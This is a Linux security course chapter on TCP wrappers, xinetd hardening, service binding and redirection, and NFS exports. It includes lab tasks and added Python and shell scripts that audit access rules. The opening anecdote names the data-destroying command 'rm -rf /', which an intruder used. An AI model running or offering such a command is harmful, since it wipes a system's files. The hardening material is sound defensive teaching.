The year was 1990, and the location was Eindhoven University of Technology, in Eindhoven, Netherlands. The University was under heavy attack from a Dutch hacker who had obtained root-level access. This hacker opened a lot of eyes to the destructiveness of hackers with the simple command rm -rf /. This command can cause considerable damage; it is similar to the format command in MS-DOS. The University employed Wietse Venema in the Mathematics and Computer Science Department. In response to these attacks, he developed a program that could control host access and track and log intruders. This program is what we now know as TCP wrappers.

TCP wrappers work by providing a checkpoint between a request for a service and the service itself. This checkpoint—the TCP wrapper daemon (tcpd)—answers the requests for network services on behalf of the service. The daemon then consults configuration files and performs security checks before it allows the request to be passed to the service. This provides two functional advantages to the network over traditional service-controlling systems:

• The TCP wrappers operate separately from the service or application that the wrappers are protecting. This way, applications and services do not need to be rewritten, and can use common configuration files for management.

• The connecting client does not know that TCP wrappers are in operation. There will never be a message back to the remote client reporting on success or failure.

TCP wrapper: A software tool for security which provides additional network logging, and restricts service access to authorized hosts by service.

hacker: A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.


TCP Wrappers Configuration Files

Two configuration files are used by TCP wrappers to provide host-based access control: /etc/hosts.deny and /etc/hosts.allow. The default behavior (if there are no rules in either file) is to grant everyone access to the services. In other words, you need to create some rules if you want control.

The rules of these two files must be created in a careful order. This is due to the fact that the system reads each file from the top down, and reads the rules in the allow file before reading the rules in the deny file. Therefore, a specific denial rule for a host, made in the deny file, will not be used if that same host is granted access in the allow file.

The rules in the configuration files are single-line entries. Any line that is blank or that begins with the comment character (#) will be ignored. The rules have the following fields:

<daemon_list>: <client_list>[: spawn <shell_command> ]

Where:

• daemon_list defines the process(es) or wildcard(s), each separated by whitespace.

• client_list defines the hostname(s), IP address(es), pattern(s), or wildcard(s), each separated by whitespace, to use when a process name matches the requested service.

• shell_command defines an optional command to be executed when a rule matches.

The description for client_list mentions pattern(s). Patterns are useful for grouping clients together. The common method for grouping clients is to use the decimal point (.). By using the decimal point, you can identify groups of hosts, either by domain name or by IP address. Placing the decimal point at the leading edge of a string will include all hosts whose name ends with that string. So the following two examples would be grouped together if the client_list was .securitycertified.net:

scnp.securitycertified.net
scna.securitycertified.net

Likewise, the decimal point can be used with IP addresses. If you have a client_list of 192.168., then all IP addresses that begin with 192.168. will be grouped together.

Wildcards can also be used in the creation of access rules. There are five wildcards that you can use:

• ALL—This wildcard matches every client with a given service (or every service with a client).

• LOCAL—This wildcard matches any host whose name does not contain a decimal point character (.).

• KNOWN—This wildcard matches any host where the hostname and the address are known, or where the user is known.

• UNKNOWN—This wildcard matches any host where the hostname and the address are unknown, or where the user is unknown.

• PARANOID—This wildcard matches any host where the hostname does not match the host address.

host based: Information, such as audit data from a single host, which may be used to detect intrusions.

The default behavior of the access control of TCP wrappers is to grant access. There must be a rule to deny all in hosts.deny, if that is the behavior you want.


In addition to these wildcards, there is another keyword that can be used in these lines: EXCEPT. The use is logical, as you would anticipate. For example, if you want to have every host from the 192.168.10.0 network, but not the single host 192.168.10.5, then the rule would be:

ALL: 192.168.10. EXCEPT 192.168.10.5

Take a look at the following sample lines. Remember that lines with the (#) character are comment lines, so they will be ignored.

# all hosts in the local network
ALL: LOCAL
# all hosts in securitycertified.net, except insecure.securitycertified.net
ALL: .securitycertified.net EXCEPT insecure.securitycertified.net
# all hosts in the 172.16.23.0 network
ALL: 172.16.23.
# all local hosts access to the ftp service
in.ftpd: LOCAL
# all local hosts access to all services, except for the ftp service
ALL EXCEPT in.ftpd: LOCAL
# single host 10.20.23.45 access to the telnet service
in.telnetd: 10.20.23.45

In this example, you might wonder whether these are lines granting access or lines denying access. In reality, they are both. The deciding factor is not the line itself, but the location of the line. Mentioned earlier was the fact that there are two configuration files, one called /etc/hosts.deny and the other /etc/hosts.allow. By placing the line in one of the files, you are deciding on the denial of access or the granting of access.

The following configuration examples show different levels of security on the network. This first example grants access to all local hosts, all hosts in the securitycertified.net domain except for hacker1.securitycertified.net, and all hosts in the 10.20.23.0 network except for 10.20.23.45. For the denial, the hosts.deny configuration specifically denies all other hosts.

/etc/hosts.allow
ALL: LOCAL
ALL: .securitycertified.net EXCEPT hacker1.securitycertified.net
ALL: 10.20.23. EXCEPT 10.20.23.45

/etc/hosts.deny
ALL: ALL

The next example is very restrictive, only allowing a few hosts to have access. In addition, access varies by specific service on the machine.

/etc/hosts.allow
ALL: 172.168.10.54
in.ftpd: 172.168.10.42
in.telnetd: 172.168.10.42

/etc/hosts.deny
ALL: ALL

Finally, this third example is also quite restrictive. In this case, the only allowed service is an internal ftp server.


/etc/hosts.allow
in.ftpd: LOCAL

/etc/hosts.deny
ALL: ALL

The last option that we need to mention was listed in the full rule, called shell_command. This is very often used for what are known as booby traps. Remember, the rule line is service(s):client(s):shell_command. Shell commands use expansions (sometimes called variables) in their execution. Shell-command expansions apply to all shell commands, and include those listed in the following table.

Expansion  Description
%a         Client IP address.
%A         Server IP address.
%c         Client information, including user name and hostname, or user name and IP address.
%d         Daemon process name.
%h         Client hostname. If unavailable, the IP address is used.
%H         Server hostname. If unavailable, the IP address is used.
%u         Client user name. If unavailable, "unknown" is listed.

Here is an example booby trap line, from the hosts.deny file. This line will write a log line that contains client information when a host in the 192.168.23.0/24 network attempts to use Telnet:

in.telnetd: 192.168.23.: spawn (/bin/echo %c >>/var/log/telnet.log)


TASK 3C-1

Controlling Access with TCP Wrappers

Objective: To investigate how TCP Wrappers can be used for access control by developing a possible solution for a fictitious scenario.

1. You have been assigned the project to manage access to certain Linux services on your corporate network. Your manager has given you the following restrictions to implement; in the space provided, create the necessary /etc/hosts.allow and /etc/hosts.deny files.

• All local hosts should be able to use all services, except for telnet.

• All hosts from the securitycertified.net domain should be denied, except for scnp_server.securitycertified.net, which should have access to all services.

• All hosts from the 172.16.32.0/24 network should be granted access to all services except telnet.

• All other hosts and services should be denied.

/etc/hosts.allow
ALL except in.telnetd: LOCAL
ALL except in.telnetd: 172.16.32.
ALL: scnp_server.securitycertified.net

/etc/hosts.deny
ALL: ALL

2. Do not implement this solution; rather, discuss your results with the rest of the class.
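As an added example (constructed for this guide, not tcpd's own code), the following model of how tcpd consults hosts.allow and then hosts.deny can be used to check a rule set such as the task solution against the four requirements without touching a live machine. It embeds the task's two files as constructed sample data and handles ALL, LOCAL, KNOWN, UNKNOWN, EXCEPT (matched case-insensitively, as tcpd does), leading-dot domain patterns and trailing-dot network patterns; PARANOID, which needs a forward and reverse DNS comparison, is not modelled.

```python
"""Constructed model of tcpd's hosts.allow / hosts.deny evaluation (not tcpd's code).

Rule format: daemon_list : client_list [: spawn ...]
Lookup order: first match in hosts.allow grants; otherwise first match in
hosts.deny denies; otherwise access is granted (tcpd's default).
"""

# The task solution from the text (constructed copies for this example).
HOSTS_ALLOW = """
ALL except in.telnetd: LOCAL
ALL except in.telnetd: 172.16.32.
ALL: scnp_server.securitycertified.net
"""

HOSTS_DENY = """
ALL: ALL
"""


def _split_list(field):
    """Split 'a b EXCEPT c d' into (included, excepted) token lists."""
    included, excepted = [], []
    target = included
    for tok in field.split():
        if tok.upper() == "EXCEPT":      # tcpd compares keywords case-insensitively
            target = excepted
        else:
            target.append(tok)
    return included, excepted


def parse_rules(text):
    """Return [(daemon_list, client_list)], ignoring blanks, comments and spawn options."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 2:
            raise ValueError("malformed access rule: %r" % raw)
        rules.append((_split_list(parts[0]), _split_list(parts[1])))
    return rules


def _daemon_matches(tok, daemon):
    return tok.upper() == "ALL" or tok == daemon


def _client_matches(tok, hostname, ip):
    """hostname is None when the reverse lookup failed (tcpd's UNKNOWN case)."""
    upper = tok.upper()
    if upper == "ALL":
        return True
    if upper == "LOCAL":
        return hostname is not None and "." not in hostname
    if upper == "KNOWN":
        return hostname is not None
    if upper == "UNKNOWN":
        return hostname is None
    if tok.startswith("."):                # domain suffix pattern, e.g. .securitycertified.net
        return hostname is not None and hostname.lower().endswith(tok.lower())
    if tok.endswith("."):                  # network prefix pattern, e.g. 172.16.32.
        return ip.startswith(tok)
    return tok == ip or (hostname is not None and tok.lower() == hostname.lower())


def _list_matches(parsed, matcher):
    included, excepted = parsed
    return any(matcher(t) for t in included) and not any(matcher(t) for t in excepted)


def _rule_matches(rule, daemon, hostname, ip):
    daemons, clients = rule
    return (_list_matches(daemons, lambda t: _daemon_matches(t, daemon))
            and _list_matches(clients, lambda t: _client_matches(t, hostname, ip)))


def access_decision(allow_rules, deny_rules, daemon, hostname, ip):
    """Return 'allow' or 'deny' the way tcpd would for this daemon/client pair."""
    for rule in allow_rules:
        if _rule_matches(rule, daemon, hostname, ip):
            return "allow"
    for rule in deny_rules:
        if _rule_matches(rule, daemon, hostname, ip):
            return "deny"
    return "allow"                         # no rule in either file: tcpd grants access


if __name__ == "__main__":
    allow, deny = parse_rules(HOSTS_ALLOW), parse_rules(HOSTS_DENY)
    # Constructed clients: a local host, the exempted server, an outside address.
    for daemon, host, ip in [("in.ftpd", "fileserver", "10.0.0.5"),
                             ("in.telnetd", "fileserver", "10.0.0.5"),
                             ("in.telnetd", "scnp_server.securitycertified.net", "10.0.0.9"),
                             ("in.ftpd", None, "203.0.113.9")]:
        print(daemon, host, ip, access_decision(allow, deny, daemon, host, ip))
```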

The xinetd Superdaemon

In Linux, sooner or later, you will encounter a superdaemon. A superdaemon is essentially a daemon that controls other daemons. In this case, xinetd is a superdaemon. Even earlier than the xinetd superdaemon was the inetd superdaemon, which handled network access requests. Inetd allowed for the disabling of services that you did not want to use, but provided no further security controls. It has since been replaced by xinetd.

Xinetd is used with TCP wrappers to protect the services of the system. TCP wrappers controls access to the services, and xinetd controls the configuration of the services themselves. The two work together, and are both part of the Red Hat 8 distribution. (Previously, these two components had to be compiled and installed when needed.)

The xinetd.conf File

The primary configuration information for xinetd is found in the /etc/xinetd.d directory. In this directory, you will find the specific configuration files for the network services that you want to control. The primary configuration file that manages xinetd is called /etc/xinetd.conf.

For this task, make sure that students do not change the actual files on their lab machines, or the success of future activities could be severely compromised.


The /etc/xinetd.conf file contains the configuration settings that are to apply to all services. The default file has several options, including instances, log_type, log_on_success, log_on_failure, and cps. Figure 3-18 shows an example xinetd.conf file.

Figure 3-18: The default xinetd.conf file running on Red Hat Linux 8.0.

Looking at the defaults in the example file, the following is a breakdown of the options and their meanings:

• instances—This variable defines the maximum number of requests for a particular service that can be handled at once.

• log_type—This variable defines how xinetd should handle logging. The default is to use /etc/syslog.conf and send the log to /var/log/secure.

• log_on_success—This variable defines what xinetd will log if the connection is successful. The default is the host IP address and the process ID of the server process.

• log_on_failure—This variable defines what xinetd will log if the connection is a failure. The default is the host IP address.

• cps—This variable defines the number of connections per second that are allowed to any one given service. This variable can be entered as two space-separated numbers—the first being the number of connections per second, and the second being the wait period (in seconds) if the maximum limit has been reached.


The defaults are adequate for many situations, but there are some changes you can make to the xinetd.conf file that will tighten the security of the default operation. The following options are suggested for the file:

• Create a no-access rule for everyone. This means that access to services will need to be configured on a service-by-service level. If you address this in your TCP wrappers configuration, then this is a redundant step.

• Lower the number of instances to a service from the default of 60 to 30. You will want to keep an eye on this for services that you grant, such as FTP, so that clients are not denied access.

• Add a DURATION log for successful use of services by a remote system. This data can be used for tracking purposes.

• Add an ATTEMPT log for each failed attempt at accessing a service.

• Add a RECORD log for failed attempts to track information about the remote system. This only works with select services, such as login and finger, that can be security risks when they are running.

• Add a restriction on the number of connections a single host can make to a service. A recommendation is 10, and this is done using a per_source line.

• Disable all services that you want to have blocked completely. A common example of this is the "r" services, as they are inherently insecure.

The following example is what the xinetd.conf file might look like once you have made these changes to harden its configuration:

instances = 30
log_type = SYSLOG authpriv
log_on_success = HOST PID DURATION
log_on_failure = HOST ATTEMPT RECORD
per_source = 10
no_access = 0.0.0.0/0
disabled = rlogin rsh rexec

This example shows one possible configuration of a hardened xinetd.conf file. Once you have made the modifications to the overall configuration file, you can move into the more granular configuration files of the specific services.

The xinetd.d Configuration Files

When the xinetd superdaemon starts, it reads the files in the /etc/xinetd.d directory. These files generally have the same, or a similar, name as the service they are related to. The service-specific configuration files have the same file structure as the overall xinetd.conf file you examined earlier.

Having separate and unique files in the xinetd.d directory allows for the management of services in simple, small files. Having one single file to manage would get out of control quickly, and would make it more complex to add and remove services. The following example configuration file is for the ftp service:

service ftp
{
disable = no
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.ftpd
nice = 10
}


This example shows how a simple default configuration file looks. The configuration files generally share common characteristics:

• They start with the service name as the first line. This is generally the service name as listed in /etc/services.

• Following the service name are the braces, within which the configuration details are found.

• The first line defines the service availability. If you want this service to be unavailable to anyone, you can simply disable it at this point.

• The second line defines the connection type. Often, this will be either stream or dgram, although there are two other options: raw and seqpacket. Because the connection is set to stream, the wait is set to no, as is the normal case for streams.

• The user that runs the ftp server is the root account.

• The server itself is located at /usr/sbin/in.ftpd.

• The nice setting defines the priority level of the server; in this case, a level of 10 is the average level. Levels historically run from -20 to 20, with the lower number being the higher priority—the highest then is -20.

TCP connections usually have a stream socket type, and UDP connections usually have dgram socket types.

Figure 3-19: An example xinetd.d configuration file for the ftp service.

Figure 3-19 has had some additions made to the default ftp configuration file. It is worth noting that there are over 40 configuration options that can be set in these files, and not all options can be detailed here, in the interest of time. If you are interested in reading and examining all of the options, please read the xinetd.conf man pages.

One of the configuration options is to add to or remove from the existing configuration. This is done using either the += or the -= operator. In other words, if you are adding a value such as DURATION to log_on_success, the operator is +=. This will now be added and included in the process of checks for that


service. Likewise, if you are ready to remove an option, you would use a line such as this: log_on_success -= DURATION. These are values that you want to add or remove not only within the service's configuration file itself, but in conjunction with the xinetd.conf configuration file.

The following examples define lines that can be added to the configuration files to increase security, or to control the access of the system more closely. There is a comment above each line describing it, followed by the configuration line itself.

# Change the log to a defined file, instead of using the default SYSLOG
log_type = FILE /var/log/custom_ftp_service.log
# Grant access from only a single network, based on IP address
only_from = 10.20.0.0/16
# Grant access to a single host, based on IP address
only_from = 10.20.23.45
# Grant access to two hosts, based on IP address
only_from = 10.20.23.45 10.20.23.55
# Deny access to a single host, based on IP address
no_access = 10.20.23.45
# Deny access to a single network, based on IP address
no_access = 10.20.23.0/24
# Grant access only during defined hours
access_times = 06:00 - 19:00
# Add the ability to track DURATION on successes
log_on_success += DURATION
# Remove the option to track the RECORD on failures
log_on_failure -= RECORD
# Set the priority at a high level (for example, 3)
nice = 3
# Add an identifier for the internal ftp server
id = internal_ftp
# Prevent a process from using large amounts of
# the processor. Define the total processor load at 2.5.
max_load = 2.5
# Prevent flooding of the system for the same service
# requests simultaneously. Limit the connections to 5
# Define the wait for new connections at 45 seconds
cps = 5 45
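The following added parser (constructed for this guide, not xinetd's own code) reads a defaults block from xinetd.conf and a per-service file, applies the =, += and -= operators in file order so that the service's settings layer on top of the defaults, and then lists which of the hardening points from the earlier checklist the merged service still misses. The two sample files are constructed from the page's examples (the defaults are wrapped in the defaults { } block that a real xinetd.conf uses), and the audit thresholds (instances 30, per_source 10) are the ones the text recommends.

```python
"""Constructed model of how xinetd merges defaults with a service file (not xinetd's code)."""
import re

# Constructed xinetd.conf based on the hardened example in the text.
XINETD_CONF = """
defaults
{
    instances      = 30
    log_type       = SYSLOG authpriv
    log_on_success = HOST PID DURATION
    log_on_failure = HOST ATTEMPT RECORD
    per_source     = 10
    no_access      = 0.0.0.0/0
    disabled       = rlogin rsh rexec
}
"""

# Constructed service file using the += / -= operators from the text.
FTP_SERVICE = """
service ftp
{
    id              = internal_ftp
    disable         = no
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/in.ftpd
    only_from       = 10.20.0.0/16
    log_on_failure  -= RECORD
    log_on_success  += USERID
    cps             = 5 45
}
"""

BLOCK_RE = re.compile(r"(\w+)(?:\s+([^\s{]+))?\s*\{(.*?)\}", re.S)
ATTR_RE = re.compile(r"^\s*(\w+)\s*(\+=|-=|=)\s*(.*?)\s*$")


def parse_blocks(text):
    """Return {block_name: [(attr, op, [tokens]), ...]}; 'service ftp' is keyed 'ftp'."""
    blocks = {}
    for kind, name, body in BLOCK_RE.findall(text):
        key = name if kind == "service" else kind
        attrs = []
        for line in body.splitlines():
            m = ATTR_RE.match(line.split("#", 1)[0])
            if m:
                attrs.append((m.group(1), m.group(2), m.group(3).split()))
        blocks[key] = attrs
    return blocks


def apply_attrs(config, attrs):
    """Apply (attr, op, tokens) entries to config, a dict of attr -> token list."""
    for attr, op, tokens in attrs:
        current = config.get(attr, [])
        if op == "=":
            config[attr] = list(tokens)                      # replace outright
        elif op == "+=":
            config[attr] = current + [t for t in tokens if t not in current]
        else:                                                 # "-="
            config[attr] = [t for t in current if t not in tokens]
    return config


def effective_service(defaults, service_attrs):
    """Start from the defaults block and layer the service's own settings on top."""
    return apply_attrs(apply_attrs({}, defaults), service_attrs)


def hardening_findings(cfg):
    """Return the recommendations from the text that this merged config does not meet."""
    findings = []
    if int(cfg.get("instances", ["60"])[0]) > 30:            # xinetd's default is 60
        findings.append("instances above 30")
    if "per_source" not in cfg:
        findings.append("no per_source limit")
    if "DURATION" not in cfg.get("log_on_success", []):
        findings.append("log_on_success lacks DURATION")
    if "ATTEMPT" not in cfg.get("log_on_failure", []):
        findings.append("log_on_failure lacks ATTEMPT")
    if "only_from" not in cfg and cfg.get("no_access") != ["0.0.0.0/0"]:
        findings.append("no only_from and no catch-all no_access")
    return findings


if __name__ == "__main__":
    defaults = parse_blocks(XINETD_CONF)["defaults"]
    ftp = parse_blocks(FTP_SERVICE)["ftp"]
    merged = effective_service(defaults, ftp)
    print(merged["log_on_success"], merged["log_on_failure"])
    print(hardening_findings(merged))
```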

Binding and Redirection

Another feature of xinetd is the ability to bind a service to an IP address. This can be a useful feature, even more so if your computer has multiple interfaces or multiple IP addresses. This feature is added by using the bind = IP Address line in the configuration file.

The following example is an FTP server that has two interfaces. One interface is for the internal network, and the other is for the external network. The internal network has no restrictions on access to the FTP server, but the external network is allowed to access the server only between 10:00 A.M. and 4:00 P.M. The first file is the configuration for the internal clients. This is bound to an IP address, and allows only certain IP addresses to connect.


/etc/xinetd.d/ftp_internal
service ftp
{
    id          = ftp_internal
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.ftpd
    nice        = 7
    cps         = 5 30
    only_from   = 192.168.10.0/24
    bind        = 192.168.10.1
}

This second file is the configuration for the external clients. Notice that the priority is a bit lower (nice = 10 instead of 7) and that cps is stricter (four connections per second, with a 45-second lockout instead of 30). There are no IP address restrictions, but there is a time restriction.

/etc/xinetd.d/ftp_external
service ftp
{
    id           = ftp_external
    disable      = no
    socket_type  = stream
    wait         = no
    user         = root
    server       = /usr/sbin/in.ftpd
    nice         = 10
    cps          = 4 45
    bind         = 192.168.20.1
    access_times = 10:00-16:00
}

These examples show how bind can be used with xinetd. Another feature is called redirection. Redirection allows xinetd to forward requests for a service to a different IP address and port number. A user can be rerouted to a different machine entirely for access to the service, with no notice given to the user; the redirection is designed to be transparent.

When binding and redirection are combined, you can create very specific configurations. For example, you can bind a service to one IP address and then redirect requests for it to a second machine in the network, so that the request is served by a computer customized for just that purpose. The second computer does not have to be a Linux machine. All that is required is that it runs the required service on the specified port; because port numbers can be changed, any port will do as long as the second computer listens on the one named in the redirect line. Two points to keep in mind: the redirected connection is a new TCP connection opened by the forwarding host, so the second machine sees the forwarding host's address rather than the client's (host-based controls such as only_from therefore belong on the forwarding host), and xinetd forwards the bytes unchanged, so a plaintext protocol such as telnet is just as exposed on the second leg as on the first.

In this example, there are two configurations for the telnet service. The first configuration is for the computer connected to the Internet, the one that forwards the request, which goes to port 3456 on the internal host.


service telnet
{
    id          = telnet_external
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    # with redirect set, xinetd forwards the connection itself and this server is not started
    server      = /usr/sbin/in.telnetd
    bind        = 192.168.10.1
    redirect    = 172.16.34.51 3456
}

The second computer's configuration is close to a normal telnet configuration file; it has no redirect line. Two additions are needed because the service name telnet3456 does not appear in /etc/services: type = UNLISTED tells xinetd not to look the name up there, and protocol and port state explicitly what the service listens on. The bind line pins the listener to the internal address.

service telnet3456
{
    id          = telnet_internal
    disable     = no
    type        = UNLISTED
    protocol    = tcp
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
    bind        = 172.16.34.51
    port        = 3456
}
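
A quick way to find enabled xinetd services that carry none of the access controls described above is to parse the service files themselves. The following shell script is an added example written for this page; it is not from the course and not part of xinetd. It reads a directory of xinetd service files (normally /etc/xinetd.d), reports each service as enabled or disabled and as restricted or unrestricted (only_from, no_access or access_times present), and lists the enabled services with no restriction. The sample files it creates under a temporary directory are constructed for illustration, and it assumes nothing is granted or denied by the defaults block in /etc/xinetd.conf, which it does not read.

```sh
#!/bin/sh
# Audit a directory of xinetd service files (normally /etc/xinetd.d) and list
# every enabled service that carries no host or time restriction of its own.
# Added example, not part of the course material or of xinetd. The sample
# files it builds are constructed for illustration; the defaults block in
# /etc/xinetd.conf is deliberately not consulted.

# Print one line per service block:
# "<file> <service> <enabled|disabled> <restricted|unrestricted>"
xinetd_summarize() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        awk -v file="$(basename "$f")" '
            # "service <name>" opens a block; reset the per-service flags
            /^[[:space:]]*service[[:space:]]+/ { svc = $2; enabled = 1; restricted = 0; next }
            # attribute lines look like: key = value, key += value, key -= value
            /^[[:space:]]*[A-Za-z_]+[[:space:]]*(\+=|-=|=)/ {
                key = $0; sub(/^[[:space:]]+/, "", key); sub(/[[:space:]]*(\+=|-=|=).*/, "", key)
                val = $0; sub(/^[^=]*=[[:space:]]*/, "", val); sub(/[[:space:]]+$/, "", val)
                if (key == "disable" && val == "yes") enabled = 0
                if (key == "only_from" || key == "no_access" || key == "access_times") restricted = 1
                next
            }
            # the closing brace ends the block; emit its summary line
            /^[[:space:]]*}/ && svc != "" {
                printf "%s %s %s %s\n", file, svc, (enabled ? "enabled" : "disabled"), (restricted ? "restricted" : "unrestricted")
                svc = ""
            }
        ' "$f"
    done
}

# Print "<service> (<file>)" for each enabled service with no restriction at all.
xinetd_unrestricted() {
    xinetd_summarize "$1" | awk '$3 == "enabled" && $4 == "unrestricted" { printf "%s (%s)\n", $2, $1 }'
}

# Build a constructed sample tree so the example runs stand-alone; echo its path.
make_sample_xinetd() {
    d=$(mktemp -d)
    cat > "$d/ftp_internal" <<'EOF'
service ftp
{
    id          = ftp_internal
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.ftpd
    only_from   = 192.168.10.0/24
    bind        = 192.168.10.1
}
EOF
    cat > "$d/telnet" <<'EOF'
service telnet
{
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
}
EOF
    cat > "$d/finger" <<'EOF'
service finger
{
    disable     = yes
    socket_type = stream
    wait        = no
    user        = nobody
    server      = /usr/sbin/in.fingerd
}
EOF
    echo "$d"
}

# Run against the sample tree; on a real host use: xinetd_unrestricted /etc/xinetd.d
sample=$(make_sample_xinetd)
xinetd_summarize "$sample"
echo "Enabled services with no only_from, no_access or access_times:"
xinetd_unrestricted "$sample"
rm -rf "$sample"
```

Against the constructed tree the only finding is telnet: ftp is enabled but restricted by only_from, and finger is disabled. A bind or redirect line is not counted as a restriction, because binding an address says where a service listens, not who may reach it.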

TASK 3C-2
Managing Telnet with xinetd

Setup: For this task, students should work in pairs. You are logged onto Red Hat 8 as root, and a Terminal Window is open.

1. Open Red Hat User Manager, and create a new user named telnettest,with the password of telnetpwd. Then close User Manager.

2. Open the Nautilus File Manager, and navigate to /etc/xinetd.d.

3. Right-click the telnet configuration file, and open it with Emacs. Emacs is a popular Linux text editor.

4. Enable Telnet, making sure that disable = no is set.

5. Save and close the file.

6. In a Terminal Window, enter killall -HUP xinetd (or service xinetd restart) to make xinetd re-read its configuration files so that your changes take effect.

7. Enter telnet <partnerIPaddress> to attempt to telnet into your partner’scomputer. Use the telnettest credentials specified at the start of this task.

8. After a login has been established, enter exit to close the telnet session.

9. Use Emacs to open the telnet configuration file in /etc/xinetd.d.


10. Place the insertion point at the end of the line just before the closing brace, and press Enter. Add the following line to your configuration to restrict use of the telnet service to a single address: only_from = 10.20.30.40. This IP address should not exist in the classroom!

11. Save and close the file.

12. Make xinetd re-read its configuration again so that your changes can take effect.

13. Attempt to telnet into your partner’s computer. This time the connectionis not successful.

14. Close the Nautilus File Manager.

Topic 3D
Securing Network Services

The next step in securing your Linux machine is to secure any network services, such as NFS, NIS, and Samba, that you have running on it. Let’s begin with NFS.

NFS

The Network File System (NFS) enables hosts to mount partitions on remote computers and use those mounted partitions in the same manner as local partitions, which allows files to be shared with authorized users across the network. Because the partitions are accessed like local ones, neither special passwords nor special access commands are required.

There are two primary components of using NFS, the NFS server and the NFSclient. The general process is quite straightforward. The NFS server creates theshared object, which is called the export. The NFS client then mounts theexported object from the NFS server.

If your system is running TCP wrappers, /etc/hosts.allow and /etc/hosts.deny are consulted first to decide whether a client may talk to the NFS daemons at all. For a client that passes that check, what it may mount is governed by the NFS server's own configuration file, /etc/exports.

NFS Server Configuration

Creating the actual object you want to share on the NFS server is a matter of a few short steps. But, before jumping right into the configuration of the shared objects, you should take a moment to look into the files behind NFS, and how NFS works.

The three primary configuration files for setting up and using NFS securely are/etc/hosts.deny, /etc/hosts.allow, and /etc/exports. Earlier in this course, you usedthe /etc/hosts.deny and the /etc/hosts.allow files, so they will not be detailed here(but they will be involved). This leaves /etc/exports as the new file to configure.

The /etc/exports file is essentially the access control list for the file systems that are exported to NFS clients. It is used by two daemons, the NFS mount daemon (mountd) and the NFS file server daemon (nfsd).

Configuring NFS


The mountd program handles the mount requests that the server receives from NFS clients. It checks /etc/exports for access rights and, if access is permitted, returns a file handle for the requested directory and adds an entry for the client to /etc/rmtab. When an unmount request is received, mountd removes the client’s entry from /etc/rmtab. (The /etc/rmtab file lists the clients that have mounted file systems from the local machine.) On Red Hat, mountd is started by the nfs init script rather than by xinetd, but it is built with TCP wrappers support, so /etc/hosts.allow and /etc/hosts.deny apply to it; the daemon name it checks under is mountd. For example, if you want all hosts to have access to the mount daemon, add these lines to /etc/hosts.allow:

# Allow all hosts access to the mount daemon
# (rpc.mountd consults hosts.allow under the name mountd)
mountd: ALL

The nfsd daemon runs on the NFS server and handles the client requests for filesystem operations. Although the details of each are beyond the scope of thisbook, there are a few other daemons that are used in serving NFS. All told, thereare five daemons—rpc.nfsd, rpc.lockd, rpc.statd, rpc.mountd, and rpc.rquotad.These daemons are part of the nfs-utils package, and are usually found in the/sbin or in the /usr/sbin directory.

Finally, on the service end, NFS depends on the portmapper daemon. This daemon is called either portmap or rpc.portmap. Portmap converts Remote Procedure Call (RPC) program numbers into DARPA (Defense Advanced Research Projects Agency) protocol port numbers, that is, TCP and UDP port numbers. When any RPC server starts, it tells portmap which port it is listening on and which RPC program numbers it serves. When a client wants to call an RPC program number, it asks portmap for the port number to send the RPC packets to. Because NFS uses RPC, portmap is a requirement.

With the services and daemons defined, you are now ready to get into the mainconfiguration file for the NFS server. The /etc/exports file contains a mount pointto the object to be shared and a list of the machines or other clients that areallowed to mount the file system.

Clients who want to use NFS can be defined by using different methods. One isto use the Network Information Service (NIS). NIS will be detailed shortly. Out-side of NIS, you can use IP addresses, domain names, subnets, and wildcards.

The syntax of a line is <directory to share> <client1>(options) <client2>(options), with no space between a client and its option list. The options are defined per client, to control that client's access to the shared directory. The options most often used are:

• ro—This option states that the directory access to the client is Read-Only.This is the default.

• rw—This option states that the directory access to the client is Read andWrite.

• no_root_squash—By default, on the NFS server, any request made by the root account on a client is treated as if it were made by the anonymous user account (nobody, or nfsnobody on Red Hat). This default is called root_squash, and the UID of the anonymous account is based on the setting on the NFS server, not the client. If no_root_squash is set, a request made by the root account on the remote machine is given the same level of access as the root account on the NFS server. For this reason, this setting is not recommended.

• no_subtree_check—When only part of a file system is exported, the server checks on each request that the requested file lies inside the exported subtree. no_subtree_check disables that check; if the whole file system is exported, disabling it improves reliability and can increase the transfer rate.

• sync—The sync and async export options control when the server acknowledges a write. With sync, the server replies to the client only after the write has been committed to stable storage. With async, the reply is sent as soon as the request has been processed, before the data reaches disk; this is faster, but a server crash can lose data that the client believes was written.

Here are a few examples of what lines in the /etc/exports file might look like:

# Export /R&D to IP address 172.16.55.63 with read
# and write access
/R&D 172.16.55.63(rw)
# Export /Policy to the entire 172.16.55.0/24 network
# with read access
/Policy 172.16.55.0/255.255.255.0(ro)
# Export /Tech to the 192.168.20.0/24 network
# allowing root access, and read and write access.
# no_root_squash goes inside the parentheses; written after
# a space it would be read as the name of another client.
/Tech 192.168.20.0/24(rw,no_root_squash)

Configuring NFS Exports

Just as with other configuration options in Linux, there are several methods of setting up NFS. You have examined some of the command lines, programs, and daemons that are involved in using NFS. One of the graphical methods of working with NFS is through the Webmin Web-based administrative tool you installed earlier in the lesson. Figure 3-20 shows Webmin’s window for creating a new exported directory.

You can see that the options are presented in a simple-to-use GUI that providesfields to fill in and radio buttons to configure the shared directory. Remember thatwhen you are using this tool, you can access and configure this information usingany browser.


Figure 3-20: Using Webmin to create an exported directory.

Webmin provides for one option of configuring NFS, and you should explore itsabilities. In this section, however, you are going to perform tasks using the toolsbuilt in to the Red Hat operating system.

The tool to use in Red Hat is called NFS Server, and it is found by choosingServer Settings from the Red Hat Main Menu, or by entering the commandredhat-config-nfs in a Terminal Window. Figure 3-21 shows the NFS Server tool.


Figure 3-21: Red Hat’s NFS Server Configuration tool.

In this tool, there are only a few primary options. The first one to examine is theprocess of adding a share. To do this, simply click the Add button to display thefollowing window, where the share information can be defined.

Figure 3-22: Adding an NFS Server share in the NFS Server configuration tool.

